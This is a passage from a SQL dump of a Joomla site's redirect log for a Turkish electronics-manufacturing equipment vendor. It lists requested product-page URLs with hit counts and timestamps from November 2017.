00:00:00',301),(13628,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-24 13:24:31','0000-00-00 00:00:00',301),(13629,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',17,0,'2017-11-24 13:36:41','0000-00-00 00:00:00',301),(13630,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-24 13:54:31','0000-00-00 00:00:00',301),(13631,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-24 14:01:24','0000-00-00 00:00:00',301),(13632,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,ordering/results,1-5?language=en-gb',NULL,'','',1,0,'2017-11-24 14:07:38','0000-00-00 00:00:00',301),(13633,'http://3s-technologies.com.tr/index.php/en/products/flux/dirdesc?language=en-gb',NULL,'','',20,0,'2017-11-24 14:15:43','0000-00-00 00:00:00',301),(13634,'http://3s-technologies.com.tr/en/administrator/components/com_joomlaupdate/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-24 14:17:41','0000-00-00 00:00:00',301),(13635,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-10?language=en-gb',NULL,'','',7,0,'2017-11-24 14:18:53','0000-00-00 00:00:00',301),(13636,'http://3s-technologies.com.tr/tr/urunler/cm-602-l-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-24 14:20:10','0000-00-00 00:00:00',301),(13637,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/results,1-50',NULL,'','',1,0,'2017-11-24 14:22:00','0000-00-00 00:00:00',301),(13638,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-42-detail',NULL,'','',7,0,'2017-11-24 14:49:59','0000-00-00 00:00:00',301),(13639,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/screen-printer',NULL,'','',1,0,'2017-11-24 14:54:39','0000-00-00 00:00:00',301),(13640,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,mf_name',NULL,'','',19,0,'2017-11-24 14:55:19','0000-00-00 00:00:00',301),(13641,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar',NULL,'','',37,0,'2017-11-24 14:57:39','0000-00-00 00:00:00',301),(13642,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-11-24 15:02:21','0000-00-00 00:00:00',301),(13643,'http://www.3s-technologies.com.tr/en/products/manufacturers/aqueous',NULL,'','',72,0,'2017-11-24 15:15:34','0000-00-00 00:00:00',301),(13644,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-20?language=en-gb',NULL,'','',3,0,'2017-11-24 15:26:23','0000-00-00 00:00:00',301),(13645,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-24 15:26:57','0000-00-00 00:00:00',301),(13646,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,product_sku/results,1-10?language=en-gb',NULL,'','',2,0,'2017-11-24 16:05:45','0000-00-00 00:00:00',301),(13647,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/results,1-10',NULL,'','',2,0,'2017-11-24 16:11:23','0000-00-00 00:00:00',301),(13648,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-24 16:18:33','0000-00-00 00:00:00',301),(13649,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-24 16:22:38','0000-00-00 00:00:00',301),(13650,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',7,0,'2017-11-24 16:22:53','0000-00-00 00:00:00',301),(13651,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',14,0,'2017-11-24 16:42:56','0000-00-00 00:00:00',301),(13652,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,ordering/results,1-10',NULL,'','',3,0,'2017-11-24 17:04:19','0000-00-00 00:00:00',301),(13653,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-24 17:26:07','0000-00-00 00:00:00',301),(13654,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-20',NULL,'','',11,0,'2017-11-24 17:35:45','0000-00-00 00:00:00',301),(13655,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name?language=en-gb',NULL,'','',25,0,'2017-11-24 17:36:30','0000-00-00 00:00:00',301),(13656,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-24 17:41:22','0000-00-00 00:00:00',301),(13657,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/results,1-50',NULL,'','',3,0,'2017-11-24 17:47:00','0000-00-00 00:00:00',301),(13658,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-50?language=en-gb',NULL,'','',5,0,'2017-11-24 17:52:37','0000-00-00 00:00:00',301),(13659,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,product_sku',NULL,'','',3,0,'2017-11-24 17:55:10','0000-00-00 00:00:00',301),(13660,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/results,1-20',NULL,'','',4,0,'2017-11-24 18:20:45','0000-00-00 00:00:00',301),(13661,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',10,0,'2017-11-24 18:32:00','0000-00-00 00:00:00',301),(13662,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/results,1-20',NULL,'','',1,0,'2017-11-24 18:37:37','0000-00-00 00:00:00',301),(13663,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',4,0,'2017-11-24 18:43:15','0000-00-00 00:00:00',301),(13664,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-24 18:48:10','0000-00-00 00:00:00',301),(13665,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-24 19:21:23','0000-00-00 00:00:00',301),(13666,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_sku?language=en-gb',NULL,'','',2,0,'2017-11-24 19:29:59','0000-00-00 00:00:00',301),(13667,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/dirdesc?language=en-gb',NULL,'','',27,0,'2017-11-24 19:33:10','0000-00-00 00:00:00',301),(13668,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-k100-28-29-detail',NULL,'','',24,0,'2017-11-24 19:33:35','0000-00-00 00:00:00',301),(13669,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-24 19:41:33','0000-00-00 00:00:00',301),(13670,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-50?language=en-gb',NULL,'','',3,0,'2017-11-24 19:47:10','0000-00-00 00:00:00',301),(13671,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-11-24 19:52:48','0000-00-00 00:00:00',301),(13672,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/results,1-10',NULL,'','',9,0,'2017-11-24 20:09:41','0000-00-00 00:00:00',301),(13673,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name?language=en-gb',NULL,'','',2,0,'2017-11-24 20:15:18','0000-00-00 00:00:00',301),(13674,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-20',NULL,'','',9,0,'2017-11-24 20:43:26','0000-00-00 00:00:00',301),(13675,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,mf_name?language=tr-tr',NULL,'','',13,0,'2017-11-24 20:57:44','0000-00-00 00:00:00',301),(13676,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-24 21:00:18','0000-00-00 00:00:00',301),(13677,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-24 21:09:21','0000-00-00 00:00:00',301),(13678,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',26,0,'2017-11-24 21:12:42','0000-00-00 00:00:00',301),(13679,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-24 21:14:41','0000-00-00 00:00:00',301),(13680,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',19,0,'2017-11-24 21:22:10','0000-00-00 00:00:00',301),(13681,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-10',NULL,'','',16,0,'2017-11-24 21:22:47','0000-00-00 00:00:00',301),(13682,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/dirdesc',NULL,'','',4,0,'2017-11-24 21:34:07','0000-00-00 00:00:00',301),(13683,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/results,1-10',NULL,'','',2,0,'2017-11-24 21:39:40','0000-00-00 00:00:00',301),(13684,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name?language=tr-tr',NULL,'','',2,0,'2017-11-24 21:43:31','0000-00-00 00:00:00',301),(13685,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-24 21:45:40','0000-00-00 00:00:00',301),(13686,'http://www.3s-technologies.com.tr/en/products/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',32,0,'2017-11-24 21:58:41','0000-00-00 00:00:00',301),(13687,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-50',NULL,'','',7,0,'2017-11-24 22:02:10','0000-00-00 00:00:00',301),(13688,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1.2mm-detail',NULL,'','',26,0,'2017-11-24 22:03:50','0000-00-00 00:00:00',301),(13689,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-24 22:06:39','0000-00-00 00:00:00',301),(13690,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-24 22:13:25','0000-00-00 00:00:00',301),(13691,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/results,1-40',NULL,'','',1,0,'2017-11-24 22:19:04','0000-00-00 00:00:00',301),(13692,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-24 22:27:55','0000-00-00 00:00:00',301),(13693,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2017-11-24 22:35:55','0000-00-00 00:00:00',301),(13694,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-11-24 22:47:22','0000-00-00 00:00:00',301),(13695,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,product_sku/results,1-20?language=en-gb',NULL,'','',4,0,'2017-11-24 22:58:25','0000-00-00 00:00:00',301),(13696,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name',NULL,'','',10,0,'2017-11-24 23:02:11','0000-00-00 00:00:00',301),(13697,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-24 23:04:03','0000-00-00 00:00:00',301),(13698,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-10?language=en-gb',NULL,'','',1,0,'2017-11-24 23:09:40','0000-00-00 00:00:00',301),(13699,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-24 23:10:51','0000-00-00 00:00:00',301),(13700,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?language=en-gb',NULL,'','',7,0,'2017-11-24 23:11:07','0000-00-00 00:00:00',301),(13701,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',2,0,'2017-11-24 23:15:18','0000-00-00 00:00:00',301),(13702,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-11-24 23:33:57','0000-00-00 00:00:00',301),(13703,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',3,0,'2017-11-24 23:43:46','0000-00-00 00:00:00',301),(13704,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',53,0,'2017-11-25 00:08:53','0000-00-00 00:00:00',301),(13705,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-20?language=en-gb',NULL,'','',1,0,'2017-11-25 00:11:32','0000-00-00 00:00:00',301),(13706,'http://www.3s-technologies.com.tr/index.php/en/products/avb-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-25 00:12:55','0000-00-00 00:00:00',301),(13707,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-25 00:17:09','0000-00-00 00:00:00',301),(13708,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/results,1-20',NULL,'','',4,0,'2017-11-25 00:22:23','0000-00-00 00:00:00',301),(13709,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-50',NULL,'','',7,0,'2017-11-25 00:32:48','0000-00-00 00:00:00',301),(13710,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/ddm/reflow ovens/spartan_8s.gif',NULL,'','',3,0,'2017-11-25 00:35:10','0000-00-00 00:00:00',301),(13711,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',5,0,'2017-11-25 00:38:02','0000-00-00 00:00:00',301),(13712,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-11-25 00:43:15','0000-00-00 00:00:00',301),(13713,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim?language=tr-tr',NULL,'','',27,0,'2017-11-25 00:47:43','0000-00-00 00:00:00',301),(13714,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-5?language=en-gb',NULL,'','',1,0,'2017-11-25 00:48:28','0000-00-00 00:00:00',301),(13715,'http://3s-technologies.com.tr/en/products/manufacturer/kester',NULL,'','',24,0,'2017-11-25 00:52:59','0000-00-00 00:00:00',301),(13716,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',13,0,'2017-11-25 01:15:06','0000-00-00 00:00:00',301),(13717,'http://3s-technologies.com.tr/index.php/en/products/cm-602-l-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-25 01:19:51','0000-00-00 00:00:00',301),(13718,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',562,0,'2017-11-25 01:35:12','0000-00-00 00:00:00',301),(13719,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-25 01:45:35','0000-00-00 00:00:00',301),(13720,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',9,0,'2017-11-25 02:06:43','0000-00-00 00:00:00',301),(13721,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-10',NULL,'','',5,0,'2017-11-25 02:17:09','0000-00-00 00:00:00',301),(13722,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-25 02:22:22','0000-00-00 00:00:00',301),(13723,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',50,0,'2017-11-25 02:37:27','0000-00-00 00:00:00',301),(13724,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-25 02:44:05','0000-00-00 00:00:00',301),(13725,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',3,0,'2017-11-25 03:04:07','0000-00-00 00:00:00',301),(13726,'http://www.3s-technologies.com.tr/index.php/en/products/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-25 03:19:14','0000-00-00 00:00:00',301),(13727,'http://3s-technologies.com.tr/index.php/tr/ueruenler/ess-310-24-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-25 03:21:53','0000-00-00 00:00:00',301),(13728,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/konveyorler',NULL,'','',7,0,'2017-11-25 03:45:38','0000-00-00 00:00:00',301),(13729,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products',NULL,'','',7,0,'2017-11-25 03:46:02','0000-00-00 00:00:00',301),(13730,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-25 04:11:56','0000-00-00 00:00:00',301),(13731,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',25,0,'2017-11-25 04:47:47','0000-00-00 00:00:00',301),(13732,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',25,0,'2017-11-25 04:50:20','0000-00-00 00:00:00',301),(13733,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,ordering',NULL,'','',16,0,'2017-11-25 05:04:06','0000-00-00 00:00:00',301),(13734,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-5',NULL,'','',10,0,'2017-11-25 05:14:32','0000-00-00 00:00:00',301),(13735,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/results,1-100',NULL,'','',6,0,'2017-11-25 06:06:42','0000-00-00 00:00:00',301),(13736,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/a_stencilwasher-eco_s_250x250.jpg',NULL,'','',2,0,'2017-11-25 06:19:44','0000-00-00 00:00:00',301),(13737,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim',NULL,'','',31,0,'2017-11-25 06:35:15','0000-00-00 00:00:00',301),(13738,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/dirdesc/results,1-100',NULL,'','',9,0,'2017-11-25 07:04:06','0000-00-00 00:00:00',301),(13739,'http://3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-25 07:12:54','0000-00-00 00:00:00',301),(13740,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-25 07:18:33','0000-00-00 00:00:00',301),(13741,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-10?language=en-gb',NULL,'','',3,0,'2017-11-25 07:19:45','0000-00-00 00:00:00',301),(13742,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by?language=en-gb&mf_name',NULL,'','',2,0,'2017-11-25 07:31:32','0000-00-00 00:00:00',301),(13743,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,mf_name?language=tr-tr',NULL,'','',25,0,'2017-11-25 07:49:19','0000-00-00 00:00:00',301),(13744,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2017-11-25 07:49:28','0000-00-00 00:00:00',301),(13745,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-10',NULL,'','',10,0,'2017-11-25 07:51:03','0000-00-00 00:00:00',301),(13746,'http://3s-technologies.com.tr/index.php/en/products/flux/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-25 07:56:53','0000-00-00 00:00:00',301),(13747,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-25 07:58:19','0000-00-00 00:00:00',301),(13748,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?language=en-gb',NULL,'','',4,0,'2017-11-25 08:11:55','0000-00-00 00:00:00',301),(13749,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-50?language=en-gb',NULL,'','',5,0,'2017-11-25 08:38:00','0000-00-00 00:00:00',301),(13750,'http://3s-technologies.com.tr/en/robots.txt',NULL,'','',2159,0,'2017-11-25 08:48:13','0000-00-00 00:00:00',301),(13751,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',25,0,'2017-11-25 08:56:07','0000-00-00 00:00:00',301),(13752,'http://3s-technologies.com.tr/tr/searchreplacedb2.php',NULL,'','',2,0,'2017-11-25 09:21:40','0000-00-00 00:00:00',301),(13753,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,product_sku?language=en-gb',NULL,'','',26,0,'2017-11-25 10:01:30','0000-00-00 00:00:00',301),(13754,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',212,0,'2017-11-25 10:12:43','0000-00-00 00:00:00',301),(13755,'http://www.3s-technologies.com.tr/en/products/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',29,0,'2017-11-25 10:22:37','0000-00-00 00:00:00',301),(13756,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,category_name?language=tr-tr',NULL,'','',15,0,'2017-11-25 10:22:50','0000-00-00 00:00:00',301),(13757,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-33-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-25 10:37:23','0000-00-00 00:00:00',301),(13758,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name',NULL,'','',34,0,'2017-11-25 10:44:47','0000-00-00 00:00:00',301),(13759,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-20?language=en-gb',NULL,'','',3,0,'2017-11-25 10:58:40','0000-00-00 00:00:00',301),(13760,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-25 11:05:36','0000-00-00 00:00:00',301),(13761,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,pc.ordering,product_name/results,1-20?language=en-gb',NULL,'','',5,0,'2017-11-25 11:12:31','0000-00-00 00:00:00',301),(13762,'http://3s-technologies.com.tr/en/products/konveyorler/by,mf_name',NULL,'','',11,0,'2017-11-25 11:33:26','0000-00-00 00:00:00',301),(13763,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/dirdesc',NULL,'','',1,0,'2017-11-25 11:35:00','0000-00-00 00:00:00',301),(13764,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/le-40v-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-25 11:35:07','0000-00-00 00:00:00',301),(13765,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',3,0,'2017-11-25 11:36:08','0000-00-00 00:00:00',301),(13766,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',1,0,'2017-11-25 11:40:09','0000-00-00 00:00:00',301),(13767,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name',NULL,'','',1,0,'2017-11-25 11:40:47','0000-00-00 00:00:00',301),(13768,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/dirdesc',NULL,'','',1,0,'2017-11-25 11:41:15','0000-00-00 00:00:00',301),(13769,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name',NULL,'','',1,0,'2017-11-25 11:42:33','0000-00-00 00:00:00',301),(13770,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc',NULL,'','',2,0,'2017-11-25 11:42:44','0000-00-00 00:00:00',301),(13771,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',276,0,'2017-11-25 11:42:45','0000-00-00 00:00:00',301),(13772,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole',NULL,'','',12,0,'2017-11-25 11:42:49','0000-00-00 00:00:00',301),(13773,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/jvk-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-25 11:43:48','0000-00-00 00:00:00',301),(13774,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/tolo',NULL,'','',19,0,'2017-11-25 11:47:07','0000-00-00 00:00:00',301),(13775,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name',NULL,'','',2,0,'2017-11-25 11:52:34','0000-00-00 